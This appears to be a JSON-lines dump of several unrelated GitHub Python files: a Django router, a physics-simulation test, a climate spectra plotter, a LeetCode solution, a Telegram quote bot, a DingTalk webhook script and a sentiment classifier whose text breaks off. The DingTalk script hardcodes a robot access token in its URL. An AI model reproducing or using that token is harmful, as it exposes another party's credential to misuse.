change_status(db,pid,10)\n\ndb=db_connect();\nwhile True:\n query_tProg(db)\n \n time.sleep(5)\n","repo_name":"MetisAI/MetisAIPlatform","sub_path":"htdocs/Judge/Metis.py","file_name":"Metis.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19525520104","text":"from django.urls import path\nfrom ghostpost_app import views\n\n\nurlpatterns = [\n path('', views.index, name='homepage'),\n path('addpost/', views.addpost, name='addpost'),\n path('up_vote//', views.for_up_vote, name='up_vote_int'),\n path('down_vote//', views.for_down_vote, name='down_vote_int'),\n path('up_vote//', views.for_up_vote, name='up_vote_str'),\n path('down_vote//', views.for_down_vote, name='down_vote_str'),\n path('posts//', views.post_details, name='posts'),\n path('posts//', views.magic_post, name='magic_post'),\n path('delete//', views.delete_post, name='delete_post'),\n]\n","repo_name":"luisfff29/ghostpost","sub_path":"ghostpost_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41842133953","text":"import unittest as ut\nimport unittest_decorators as utx\nimport numpy as np\nimport espressomd\nimport espressomd.lb\nfrom itertools import product\n\n\n@utx.skipIfMissingFeatures([\"EXTERNAL_FORCES\"])\nclass LBSwitchActor(ut.TestCase):\n system = espressomd.System(box_l=[10.0, 10.0, 10.0])\n\n system.time_step = 0.01\n system.cell_system.skin = 0.1\n\n def switch_test(self, GPU=False):\n system = self.system\n system.actors.clear()\n system.part.add(pos=[1., 1., 1.], v=[1., 0, 0], fix=[1, 1, 1])\n ext_force_density = [0.2, 0.3, 0.15]\n\n lb_fluid_params = {'agrid': 2.0, 'dens': 1.0, 'visc': 1.0, 'tau': 0.03}\n friction_1 = 1.5\n friction_2 = 4.0\n\n if GPU:\n lb_fluid_1 = espressomd.lb.LBFluidGPU(**lb_fluid_params)\n lb_fluid_2 = espressomd.lb.LBFluidGPU(**lb_fluid_params)\n else:\n lb_fluid_1 = espressomd.lb.LBFluid(**lb_fluid_params)\n lb_fluid_2 = espressomd.lb.LBFluid(**lb_fluid_params)\n\n system.actors.add(lb_fluid_1)\n system.thermostat.set_lb(LB_fluid=lb_fluid_1, gamma=friction_1)\n\n system.integrator.run(1)\n\n force_on_part = -friction_1 * np.copy(system.part[0].v)\n\n np.testing.assert_allclose(np.copy(system.part[0].f), force_on_part)\n\n system.integrator.run(100)\n self.assertNotAlmostEqual(lb_fluid_1[3, 3, 3].velocity[0], 0.0)\n\n system.actors.remove(lb_fluid_1)\n\n system.part[0].v = [1, 0, 0]\n system.integrator.run(0)\n\n np.testing.assert_allclose(np.copy(system.part[0].f), 0.0)\n\n system.actors.add(lb_fluid_2)\n system.thermostat.set_lb(LB_fluid=lb_fluid_2, gamma=friction_2)\n\n for p in product(range(5), range(5), range(5)):\n np.testing.assert_allclose(\n np.copy(lb_fluid_2[p].velocity), np.zeros((3,)))\n\n system.part[0].v = [1, 0, 0]\n\n system.integrator.run(1)\n\n np.testing.assert_allclose(\n np.copy(system.part[0].f), [-friction_2, 0.0, 0.0])\n\n def test_CPU_LB(self):\n self.switch_test()\n\n @utx.skipIfMissingGPU()\n def test_GPU_LB(self):\n self.switch_test(GPU=True)\n\n\nif __name__ == \"__main__\":\n ut.main()\n","repo_name":"Khayrulbuet13/EspressoMD","sub_path":"EspressoMD-4.1.4/testsuite/python/lb_switch.py","file_name":"lb_switch.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30959596508","text":"#!/bin/env python\n\n#SBATCH --job-name=full_plot\n#SBATCH --output=full_plot_%j.out\n#SBATCH --time=20:00:00\n#SBATCH --partition=broadwl\n#SBATCH --nodes=1\n#SBATCH --mem=0\n\n# coding: utf-8\n\n# In[1]:\n\n# this file plots the original simulations\n# last edited by Claire Valva on February 23, 2019\n\n\n\n# import packages\nimport numpy as np\nfrom scipy.signal import get_window, csd\nfrom scipy.signal.windows import hann, hanning, nuttall, flattop\nfrom scipy.fftpack import fft, ifft, fftfreq, fftshift, ifftshift\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport scipy.integrate as sciint\nimport pandas as pd\nimport datetime\nimport matplotlib.cm as cm\nfrom math import pi\nimport matplotlib.ticker as tck\nimport datetime\nfrom sympy import solve, Poly, Eq, Function, exp, re, im\nfrom netCDF4 import Dataset, num2date # This is to read .nc files and time array\nfrom scipy.optimize import fsolve\nfrom decimal import Decimal\nimport pickle\nimport multiprocessing as mp\nfrom joblib import Parallel, delayed\nimport matplotlib.colors as colors\nfrom seaborn import cubehelix_palette #for contour plot colors\nimport seaborn as sns\nfrom decimal import Decimal\nimport numpy.ma as ma\n\nseasons = [\"winter\", \"spring\", \"summer\", \"fall\"]\ndef add_cyclic_point(data, coord=None, axis=-1):\n \"\"\"\n Add a cyclic point to an array and optionally a corresponding\n coordinate.\n\n \"\"\"\n \n if coord is not None:\n if coord.ndim != 1:\n raise ValueError('The coordinate must be 1-dimensional.')\n if len(coord) != data.shape[axis]:\n raise ValueError('The length of the coordinate does not match '\n 'the size of the corresponding dimension of '\n 'the data array: len(coord) = {}, '\n 'data.shape[{}] = {}.'.format(\n len(coord), axis, data.shape[axis]))\n delta_coord = np.diff(coord)\n if not np.allclose(delta_coord, delta_coord[0]):\n raise ValueError('The coordinate must be equally spaced.')\n new_coord = ma.concatenate((coord, coord[-1:] + delta_coord[0]))\n slicer = [slice(None)] * data.ndim\n try:\n slicer[axis] = slice(0, 1)\n except IndexError:\n raise ValueError('The specified axis does not correspond to an '\n 'array dimension.')\n new_data = ma.concatenate((data, data[slicer]), axis=axis)\n if coord is None:\n return_value = new_data\n else:\n return_value = new_data, new_coord\n return return_value\n\ndef padded(to_pad, max_len):\n length = len(to_pad)\n zeros = max_len - length\n to_pad = list(to_pad)\n for i in range(zeros):\n to_pad.append(0)\n return to_pad\n\n# In[3]:\nzonal_spacing = fftfreq(240,1.5)\nzonal_spacing = 1/zonal_spacing\nzonal_spacing= 360 / zonal_spacing\n\n\n# In[4]:\n\n# get file neams for detrending\nfrom os import walk\n\nf = []\nfor (dirpath, dirnames, filenames) in walk('gphfiles/'):\n f.extend(filenames)\n break\n\nfor wantfile in range(len(f)):\n \n # Access data store\n data_store = pd.HDFStore('new_detrend_' + str(f[wantfile][-10:-5]) + '.h5')\n\n # Retrieve data using key\n untrend_df = data_store['untrend_geopot']\n data_store.close()\n \n # kdljfal;sd\n untrend_df[\"seasonmean\"] = untrend_df.groupby(by=['year','lon','season'])['adj_z'].transform('mean')\n untrend_df[\"diff_mean\"] = untrend_df[\"adj_z\"] - untrend_df[\"seasonmean\"]\n \n # split dataframe into pieces so can perform fft\n untgroup = untrend_df.groupby([\"year\",\"season\", \"lon\"]) \n other_inds = untrend_df.groupby([\"year\",\"season\"]).apply(lambda x: x.name) \n z_only = untgroup[\"diff_mean\"]\n z_names = z_only.apply(lambda x: x.name)\n\n # get each longitude of each group\n grouped_a = [z_only.get_group(name) for name in z_names]\n\n ind_match = [[group for group in z_names \n if group[0] == other[0] \n and group[1] == other[1]] \n for other in other_inds]\n\n grouped_b = [[z_only.get_group(name) for name in sublist] \n for sublist in ind_match]\n grouped_b = np.real(grouped_b)\n\n bglist = [[list(item) for item in sublist] for sublist in grouped_b]\n\n d2_trans = [np.fft.fft2(sublist) for sublist in bglist]\n\n d2_touse = d2_trans[0:len(d2_trans)-1]\n d2_seasons = [[d2_touse[i] for i in range(len(d2_touse)) \n if other_inds[i][1] == part] for part in seasons]\n\n\n\n\n\n len_list = [[len(entry[0]) for entry in season] for season in d2_seasons]\n max_len = [max(entry) for entry in len_list]\n padded_lists = [[[padded(row, max_len[i]) for row in entry] \n for entry in d2_seasons[i]] for i in range(4)]\n\n d2_averages = [np.average(entry, axis = 0) for entry in padded_lists]\n\n #save spectra:\n tosave = [d2_touse, d2_seasons, d2_averages]\n\n file_name = \"spectra_02_\" + str(f[wantfile][-10:-5]) + \"arr.pickle\"\n file_pickle = open(file_name, \"wb\")\n pickle.dump(tosave, file_pickle)\n\n season_titles = [\"Winter\", \"Spring\", \"Summer\", \"Fall\"]\n\n def spec_plot(title = 0, data = d2_averages[0], levels = \"no\", save = False, name = None):\n\n #select a season for plotting\n test_dat = data\n frequencies = fftfreq(len(test_dat[1]), 0.25)\n \n #set what you wanna crop\n max_z = 40\n max_f = 1\n\n #crop the data, only keep the positive frequencies\n cropped = [[test_dat[i][j] for i in range(len(zonal_spacing)) \n if zonal_spacing[i] <= max_z and zonal_spacing[i] >= 0]\n for j in range(len(frequencies)) \n if np.abs(frequencies[j]) <= max_f]\n\n cropf = [counted for counted in frequencies if np.abs(counted) <= max_f]# and counted != 0]\n cropz = [zonal_spacing[i] for i in range(len(zonal_spacing)) \n if zonal_spacing[i] <= max_z and zonal_spacing[i] >= 0]\n\n x = cropf\n y = cropz\n X, Y = np.meshgrid(x,y)\n X = np.flip(X,1)\n Z = np.transpose(np.abs(cropped))\n\n # add cyclic point for plotting purposes\n x = np.array(x)\n testZ = [fftshift(entry) for entry in Z]\n testZ = np.array(testZ)\n\n dataout, lonsout = add_cyclic_point(testZ,fftshift(x))\n x = lonsout\n y = y\n X, Y = np.meshgrid(x,y)\n X = np.flip(X,1)\n\n # set colors and levels for discrete values\n # colors_set = cubehelix_palette(10)\n colors_set = sns.cubehelix_palette(10, start=2, rot=0, dark=0, light=.95)\n \n if levels == \"no\":\n # set colors and levels for discrete values\n level_set_less = [np.percentile(dataout, j*10) for j in range(1,11)]\n for j in range(1,5):\n level_set_less.append(np.percentile(dataout, 90 + 2*j))\n #level_set_less = flatten(level_set_less)\n level_set_less.sort()\n levels_rec.append(level_set_less)\n \n else:\n level_set_less = levels\n \n colors_set = sns.palplot(sns.color_palette(\"hls\", len(level_set_less)))\n colors_set = sns.cubehelix_palette(14, start=2, rot=0, dark=0, light=.95)\n colors_set = sns.color_palette(\"cubehelix\", 14)\n\n # plot it\n plt.clf();\n plt.figure(figsize=(15, 5), constrained_layout=True);\n # actual plot\n\n CF = plt.contourf(X,Y,dataout, colors = colors_set, levels = level_set_less,)\n\n # set colorbars\n\n CBI = plt.colorbar(CF)\n ax = CBI.ax\n ax.text(-2.5,0.8,'Coefficient magnitude',rotation=90)\n \n # ax.yaxis.get_offset_text().set_position((-3, 5))\n\n labels = [\"{:.1E}\".format(Decimal(entry)) for entry in level_set_less]\n\n CBI.set_ticklabels(labels)\n # plot labels\n plt.xlabel(r\"Frequency (day$^{-1}$)\")\n plt.ylim(ymax = 25, ymin = 3)\n plt.xlim(xmax = 0.75, xmin = -0.75)\n plt.ylabel(\"Zonal wavenumber\")\n plt.title(str(title) + \" climatology of geopotential height spectra\", pad = 15)\n\n # formatting\n sns.set_style(\"ticks\")\n sns.set_context(\"poster\")\n sns.despine()\n \n if save == True:\n \n plt.savefig(name, bbox_inches = \"tight\")\n\n # plt.show()\n \n levels_rec = []\n\n for j in range(4):\n name = \"spec_plots/02_test_spectra_\" + seasons[i] + \"_\"+ str(f[wantfile][-10:-5]) + \".png\"\n title = str(f[wantfile][-10:-5]) + \" \"+ season_titles[i] \n spec_plot(title , d2_averages[i], name = name, save = True)\n \n actual_levels = np.average(levels_rec, axis = 0)\n\n for i in range(4):\n name = \"spec_plots/02_test_spectra_\" + seasons[i] + \"_\"+ str(f[wantfile][-10:-5]) + \".png\"\n title = str(f[wantfile][-10:-5]) + \" \"+ season_titles[i]\n spec_plot(title , d2_averages[i], levels = actual_levels, name = name, save = True)\n","repo_name":"clairevalva/wavy-sims","sub_path":"lin-assumption-2/plotter-Copy1.py","file_name":"plotter-Copy1.py","file_ext":"py","file_size_in_byte":8913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22376707603","text":"# 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n\n\nclass Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n return_value = nums[0]\n sum = 0\n for each in nums:\n if sum < 0:\n sum = 0\n sum += each\n if sum > return_value:\n return_value = sum\n return return_value\n\n\nsol = Solution()\na = [1, 2]\n\nres = sol.maxSubArray(a)\nprint(res)\n","repo_name":"Colaplusice/algorithm_and_data_structure","sub_path":"LeetCode/week_36/53_最大子序和.py","file_name":"53_最大子序和.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38238023651","text":"#!/usr/bin/env python3\n# -*- encoding: utf8 -*-\n\n\"\"\"ASkiBot, cloned from IRC to TG because newfags can't even.\"\"\"\n\nimport tgbot\nimport logging\nimport socket\nimport threading\nimport time\nimport random\nimport errno\nimport pickle\nimport collections\n\nTOKEN_TXT = 'token.txt'\nKEULII_TXT = 'keulii.txt'\nQUOTES_DIR = 'quotes'\nMOPOPOSTERPORT = 6688\n\nclass Mopoposter:\n \"\"\"Simple message receiver on a tcp socket.\n\n Keulii messages go here too in realtime.\n They get logged to a file elsewhere.\n\n Listen for messages on new connections.\n One message per connection, closed automatically.\n Messages sent to a callback.\n \"\"\"\n ENCODING = 'latin-1'\n def __init__(self, port, sendfunc):\n self.port = port\n self.sendfunc = sendfunc\n self.serversocket = None\n self.thread = None\n\n def start(self):\n self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.serversocket.bind(('127.0.0.1', self.port))\n self.serversocket.listen(20)\n\n self.thread = threading.Thread(target=self.acceptLoop)\n self.thread.start()\n\n def acceptLoop(self):\n while True:\n try:\n (clientsocket, address) = self.serversocket.accept()\n except OSError as err:\n if err.errno == errno.EINVAL:\n # invalid argument, servsocket closed\n break\n if err.errno == errno.EBADF:\n # bad file descriptor also equals to closing\n break\n raise\n\n self.handleConnection(clientsocket)\n\n def handleConnection(self, sock):\n sock.settimeout(5.0)\n try:\n msg = sock.recv(1024)\n except socket.timeout:\n # just clean up\n pass\n else:\n if len(msg) > 0:\n self.sendfunc(msg.decode(self.ENCODING))\n finally:\n sock.shutdown(socket.SHUT_RDWR)\n sock.close()\n\n def stop(self):\n if self.serversocket:\n self.serversocket.shutdown(socket.SHUT_RDWR)\n self.serversocket.close()\n if self.thread:\n self.thread.join()\n\nclass QuotesBase:\n \"\"\"Get a random quote for a chat channel.\"\"\"\n TIME_LIMIT = 15*60\n ERR_MSG = 'Elä quottaile liikaa'\n\n def __init__(self):\n self.last_requests = {}\n\n def get(self, chan_id, user_id, search_term):\n \"\"\"Public api to get one message; search term is for whole lines.\n\n The number of gets is restricted to one within the time limit for a\n single user, unless another user asks for one; then the limit starts\n for that user.\"\"\"\n now = time.time()\n last_user, last_time = self.last_requests.get(chan_id, (None, 0))\n if user_id == last_user and now - last_time < self.TIME_LIMIT:\n return (user_id, self.ERR_MSG)\n\n msg = self._search(chan_id, search_term)\n # the user can try again if nothing was found\n if msg is not None:\n self.last_requests[chan_id] = (user_id, now)\n return (chan_id, msg)\n\n return (chan_id, None)\n\n def _search(self, chan_id, term):\n \"\"\"Find that message on a chat channel.\"\"\"\n term = term.lower().strip()\n lines = [x.strip() for x in self._listQuotes(chan_id)\n if term in x.lower()]\n return random.choice(lines) if len(lines) else None\n\n def _listQuotes(self):\n \"\"\"Subclasses should do this\"\"\"\n raise NotImplementedError\n\nclass Keulii(QuotesBase):\n \"\"\"One global quotefile for all chats.\n\n Time limit is still per chat.\n Adding not supported, since it's done elsewhere.\n They're just read in here.\n \"\"\"\n def __init__(self, filename):\n super().__init__()\n self.filename = filename\n\n def _listQuotes(self, chan_id):\n try:\n # FIXME utf8\n with open(self.filename, encoding='latin-1') as fh:\n return list(fh)\n except IOError:\n return []\n\nclass Quotes(QuotesBase):\n \"\"\"Unique quote file for each chat.\"\"\"\n def __init__(self, quotefile_dir):\n super().__init__()\n self.quotefile_dir = quotefile_dir\n\n def _listQuotes(self, chan_id):\n try:\n with open('%s/%s' % (self.quotefile_dir, chan_id), 'rb') as fh:\n return pickle.load(fh)\n except IOError:\n return []\n\n def addQuote(self, chan_id, quote):\n quotes = self._listQuotes(chan_id)\n quotes.append(quote)\n with open('%s/%s' % (self.quotefile_dir, chan_id), 'wb') as fh:\n pickle.dump(quotes, fh)\n\n\nclass TgQuote(collections.namedtuple('TgQuoteBase', 'origin msgid text adder')):\n def strip(self):\n return self\n\n def lower(self):\n return self\n\n def __contains__(self, item):\n # origin is always a user; try all of those three for easier searching\n return item in ('%s %s %s %s' % (\n self.origin.get('username', ''),\n self.origin.get('first_name', ''),\n self.origin.get('last_name', ''),\n self.text)).lower()\n\ndef quotemerge(a, b, result):\n a = pickle.load(open(a, 'rb'))\n b = pickle.load(open(b, 'rb'))\n pickle.dump(a + b, open(result, 'wb'))\n\ndef getUserDesc(user):\n \"\"\"Either \"username\" or \"first last\" (one of those should exist)\n\n Use only for human interaction, not for detecting stuff like with IDs\"\"\"\n return user.get('username',\n '%s %s' % (\n user.get('first_name', ''),\n user.get('last_name', '')))\n\ndef getChatDesc(chat):\n \"\"\"Either chat title or the user if it's a personal 1-on-1 chat\n\n Use only for human interaction, not for detecting stuff like with IDs\"\"\"\n return chat.get('title', getUserDesc(chat))\n\n\nclass AskibotTg:\n MOPOPOSTER_SAVE_FILENAME = 'mopoposter.pickle'\n def __init__(self, connection, keuliifilename, mopoposterport, quotesdir):\n self.conn = connection\n self.update_offset = 0\n\n try:\n with open(self.MOPOPOSTER_SAVE_FILENAME, 'rb') as fh:\n self.mopoposter_broadcast = pickle.load(fh)\n except IOError:\n self.mopoposter_broadcast = {}\n self.mopoposter = Mopoposter(mopoposterport, self.sendMopoposter)\n self.keulii = Keulii(keuliifilename)\n self.quotes = Quotes(quotesdir)\n # record the last /addq place to save the quote to the right place when\n # forwarded to the bot.\n self.last_addq_chat = {}\n\n self.running = False\n\n me = self.conn.getMe()\n self.username = me['username']\n\n def saveMopoposterBroadcast(self):\n try:\n with open(self.MOPOPOSTER_SAVE_FILENAME, 'wb') as fh:\n pickle.dump(self.mopoposter_broadcast, fh)\n except IOError:\n logging.error('Cannot open mopoposter save %s' % self.MOPOPOSTER_SAVE_FILENAME)\n\n def helpMsg(self):\n return '''Olen ASkiBot, killan irkistä tuttu robotti. Living tissue over metal endoskeleton.\n\n/keulii HAKUTEKSTI - Hae mopopostereista tekstinpätkää, hakutekstillä tai ilman.\n/keuliiregister - Rekisteröi tämä kanava reaaliaikaiseksi mopoposterikuuntelijaksi.\n/keuliiunregister - Kumoa rekisteröinti, viestejä ei enää tule. Sallittu vain rekisteröijälle ja ylläpitäjälle.\n\n/q HAKUTEKSTI - kuin mopoposter, mutta kanavakohtaisille quoteille.\n/addq - merkitse lisättävä quote tälle kanavalle. Lisää se sitten forwardaamalla yksityisesti botille.\n\nBottia ylläpitää sooda. https://github.com/sooda/askibot-tg\n'''\n\n def run(self):\n \"\"\"Start the main loop that goes on until user ^C's this.\"\"\"\n self.running = True\n try:\n self.mopoposter.start()\n self.loopUpdates()\n except KeyboardInterrupt:\n pass\n\n self.mopoposter.stop()\n\n def stop(self):\n # just for the tests\n self.running = False\n\n def sendMopoposter(self, msg):\n \"\"\"Got a message, broadcast it to the listeners.\"\"\"\n for chatid in self.mopoposter_broadcast.keys():\n self.conn.sendMessage(chatid, 'KEULII! ' + msg)\n\n def loopUpdates(self):\n while self.running:\n # btw, looks like the server timeouts with status ok and an empty\n # result set after just 20 seconds\n for update in self.conn.getUpdates(\n offset=self.update_offset, timeout=60):\n self.handleUpdate(update)\n\n def handleUpdate(self, update):\n \"\"\"Got one line from the server.\"\"\"\n upid = update['update_id']\n try:\n msg = update['message']\n except KeyError:\n logging.warning(\"what?? no message in update: <%s>\" % update)\n else:\n self.handleMessage(msg)\n self.update_offset = upid + 1\n\n def handleMessage(self, msg):\n \"\"\"Manage the message itself; just pass it around to a handler.\"\"\"\n if 'text' in msg:\n text = msg['text']\n commands = {\n '/help': self.cmdHelp,\n '/start': self.cmdStart,\n '/keulii': self.cmdKeulii,\n '/keuliiregister': self.cmdKeuliiRegister,\n '/keuliiunregister': self.cmdKeuliiUnRegister,\n '/mopoposterpost': self.cmdMopoposterPost,\n '/q': self.cmdQuote,\n '/addq': self.cmdAddQuote,\n }\n\n if 'forward_from' in msg:\n # this is a private message; from and chat are the same (the\n # bot can't see public ones). forward_from is the original\n # user, but the original chat is lost\n self.cmdForwardedMessage(msg, msg['from'],\n msg['forward_from'])\n\n try:\n cmdname, args = text.split(' ', 1)\n except ValueError:\n # no args\n cmdname = text\n args = ''\n # tg specifies that /cmd@nick should work just for us\n if '@' in cmdname:\n cmdname, target = cmdname.split('@', 1)\n if target.lower() != self.username.lower():\n return\n cmdname = cmdname.lower()\n # just silently ignore other commands: they may be directed to\n # other bots\n if cmdname in commands:\n commands[cmdname](args, msg['chat'], msg['from'])\n\n def cmdHelp(self, text, chat, user):\n \"\"\"Respond in the chat with the command list.\"\"\"\n self.conn.sendMessage(chat['id'], self.helpMsg())\n\n def cmdStart(self, text, chat, user):\n \"\"\"Was this suggested by the protocol or something?\"\"\"\n self.conn.sendMessage(chat['id'], 'please stop')\n\n def cmdKeulii(self, text, chat, user):\n \"\"\"Query for a keulii msg.\"\"\"\n target, response = self.keulii.get(chat['id'], user['id'], text)\n if response is not None:\n self.conn.sendMessage(target, response)\n\n def cmdKeuliiRegister(self, text, chat, user):\n \"\"\"Register this chat to the keulii broadcast list.\"\"\"\n # public and private registrations are accepted, chat is one of them\n title = getChatDesc(chat)\n if self.mopoposter_broadcast.get(chat['id'], None):\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestit jo rekisteröity (' + title + ')')\n else:\n self.mopoposter_broadcast[chat['id']] = user['id']\n self.saveMopoposterBroadcast()\n self.conn.sendMessage(user['id'],\n 'OK, keuliiviestit rekisteröity: ' + title)\n\n def cmdKeuliiUnRegister(self, text, chat, user):\n \"\"\"Unregister this chat from the keulii broadcast list.\n\n Others can re-register immediately and the ownership changes then.\n \"\"\"\n title = getChatDesc(chat)\n owner = self.mopoposter_broadcast.get(chat['id'], None)\n if owner == user['id']:\n del self.mopoposter_broadcast[chat['id']]\n self.saveMopoposterBroadcast()\n self.conn.sendMessage(user['id'],\n 'OK, keuliiviestejä ei enää lähetetä: ' + title)\n elif owner is None:\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestejä ei rekisteröity (' + title + ')')\n else:\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestit on rekisteröinyt joku muu (' + title + ')')\n\n def cmdMopoposterPost(self, text, chat, user):\n self.conn.sendMessage(user['id'],\n 'Ei toimi vielä')\n\n def cmdQuote(self, text, chat, user):\n \"\"\"Query for a quote.\"\"\"\n target, response = self.quotes.get(chat['id'], user['id'], text)\n if isinstance(response, TgQuote):\n # the from-id is somehow paired to the msgid, but doesn't seem to\n # show in the chat ui (or the forward_from field). can't send the\n # msg if from-id is wrong.\n self.conn.forwardMessage(target, response.adder['id'], response.msgid)\n elif response is not None:\n # nag the user\n self.conn.sendMessage(target, response)\n\n def cmdForwardedMessage(self, msg, user, fwd_from):\n \"\"\"Received a private forward, interpreted as a quote to be added\"\"\"\n chat = self.last_addq_chat.get(user['id'])\n if chat is None:\n self.conn.sendMessage(user['id'],\n 'Virhe: Mistä tämä tuli? Merkitse keskustelukanava ensin komentamalla siellä /addq')\n return\n\n msgid = msg['message_id']\n text = msg['text']\n\n quote = TgQuote(fwd_from, msgid, text, user)\n self.quotes.addQuote(chat['id'], quote)\n\n self.conn.sendMessage(chat['id'],\n 'addq ({} lisäsi) {}: {}'.format(getUserDesc(user), getUserDesc(fwd_from), text))\n\n del self.last_addq_chat[user['id']]\n\n def cmdAddQuote(self, text, chat, user):\n \"\"\"addq marks the chat to record the next forward on\"\"\"\n self.last_addq_chat[user['id']] = chat\n title = getChatDesc(chat)\n self.conn.sendMessage(user['id'],\n 'addq: Forwardaa viesti niin tallennan (' + title + ')')\n\ndef main():\n logging.basicConfig(filename='debug.log', level=logging.DEBUG,\n format='%(asctime)s [%(levelname)-8s] %(message)s')\n token = open(TOKEN_TXT).read().strip()\n bot = AskibotTg(tgbot.TgbotConnection(token), KEULII_TXT,\n MOPOPOSTERPORT, QUOTES_DIR)\n print(bot.conn.getMe())\n bot.run()\n\nif __name__ == '__main__':\n main()\n","repo_name":"sooda/askibot-tg","sub_path":"askibot.py","file_name":"askibot.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6972204709","text":"import requests\nimport json\nimport urllib.parse\nurl = 'https://oapi.dingtalk.com/robot/send?access_token=faa8a4758761fff3c9a2269a0cacb573d2a906de9c1b74f0bf8e400251ebdcf0'\nHEADERS = {\n\"Content-Type\": \"application/json ;charset=utf-8 \"\n}\n\nString_textMsg = {\n \"msgtype\": \"text\",\n \"text\": {\n \"content\": \"我就是我, @18612697503 是不一样的烟火\"\n },\n \"at\": {\n \"atMobiles\": [\n \"18612697503\"\n ], \n # \"isAtAll\": \"true\"\n }\n }\n\nString_textMsg = json.dumps(String_textMsg)\nres = requests.post(url, data=String_textMsg, headers=HEADERS)\nprint(res.text)\n\n","repo_name":"305831462/FIRST","sub_path":"webApp/dingTest.py","file_name":"dingTest.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9032688146","text":"#-*- coding: utf-8 -*-\n\n# 第一步:定义特征和目标===========================================================\nimport pandas as pd\ndf = pd.read_excel('NewData.xlsx',encoding='utf-8')\nX = df[['comment']]\ny = df.sentiment\n\n\n# 第二步:用结巴分词拆分句子为词语=================================================\nimport jieba\ndef chinese_cut(mytext): # 建立一个辅助函数,将分词的结果用空格连接\n return \" \".join(jieba.cut(mytext))\nX['cut_comment'] = X.comment.apply(chinese_cut) # apply将每一行的评论都进行分词\nprint(\"分词之后的前5行是:\")\nprint(X.cut_comment[:5]) # 查看前五行,看分词是否成功\n\n\n# 第三步:剔除掉停用词、且将词转化为词向量=========================================\n# 3.1 定义停用词格式====================\ndef get_stopwords(file):\n with open(file,encoding='utf-8') as f:\n stopwords = f.read()\n stopwords_list = stopwords.split('\\n')\n new_stopwords_list = [i for i in stopwords_list] # 把停用词作为列表格式保存\n return new_stopwords_list # 返回存成列表形式的停用词\nstopwords = get_stopwords('stoplist.txt')\nprint(\"停用词表后10项为:\")\nprint(stopwords[-10:])\n# 3.2 向量化============================\nmax_df = 0.8 # 定义过于平凡的词的界限\nmin_df = 3 # 定义过于独特的词的界限\nfrom sklearn.feature_extraction.text import CountVectorizer\nvect = CountVectorizer(max_df = max_df, min_df=min_df, token_pattern=u'(?u)\\\\b[^\\\\d\\\\W]\\\\w+\\\\b', stop_words=frozenset(stopwords))# 类似于正则表达式\n# 使用向量化工具CountVectorizer将评论内容的分词X_train.cut_comment转化为dataframe类型,赋值给transf_matrix\nX_train = pd.DataFrame(vect.fit_transform(X.cut_comment).toarray(), columns=vect.get_feature_names())\n\n\n\n# 第四步:划分训练集和测试集================================================================\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X_train, y, random_state=1)\nprint(\"去除停用词且向量化后训练集的格式:\")\nprint(X_train.head())\nprint(\"去除停用词且向量化后训练集的大小:\",X_train.shape)\n\n\n\n# 第五步:选分类器==========================================================================\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split,cross_val_score,StratifiedKFold\nfrom sklearn.metrics import classification_report,confusion_matrix,accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC\nmodels = []\nmodels.append(('LR',LogisticRegression(solver='liblinear',multi_class='ovr')))\nmodels.append(('LDA',LinearDiscriminantAnalysis())) # 线性判别分析\nmodels.append(('KNN',KNeighborsClassifier()))\nmodels.append(('CART',DecisionTreeClassifier()))\nmodels.append(('NB',MultinomialNB()))\nmodels.append(('SVM',SVC(gamma='auto')))\nresults = []\nnames = []\nfor name,model in models:\n kfold = StratifiedKFold(n_splits=5,random_state=1) # K交叉验证法\n cv_results = cross_val_score(model, X_train, y_train, cv=kfold,scoring='accuracy')\n results.append(cv_results)\n names.append(name)\n print('%s:%f[%f]' %(name,cv_results.mean(),cv_results.std()))\n# 画箱线图\nplt.boxplot(results,labels=names)\nplt.title('algorithm comparision')\nplt.show()\n# 最终选择分类器为MultinomialNB()\n\n\n# 第六步:预测==========================================================================\nmodel = MultinomialNB()\nmodel.fit(X_train,y_train)\ny_predict = model.predict(X_test)\nplt.figure()\nplt.plot(range(len(y_test.iloc[:50])),y_test.iloc[:50],'o',markersize=6)\nplt.plot(range(len(y_predict[:50])),y_predict[:50],'*',markersize=6)\nplt.show()\nprint(\"预测Accuracy 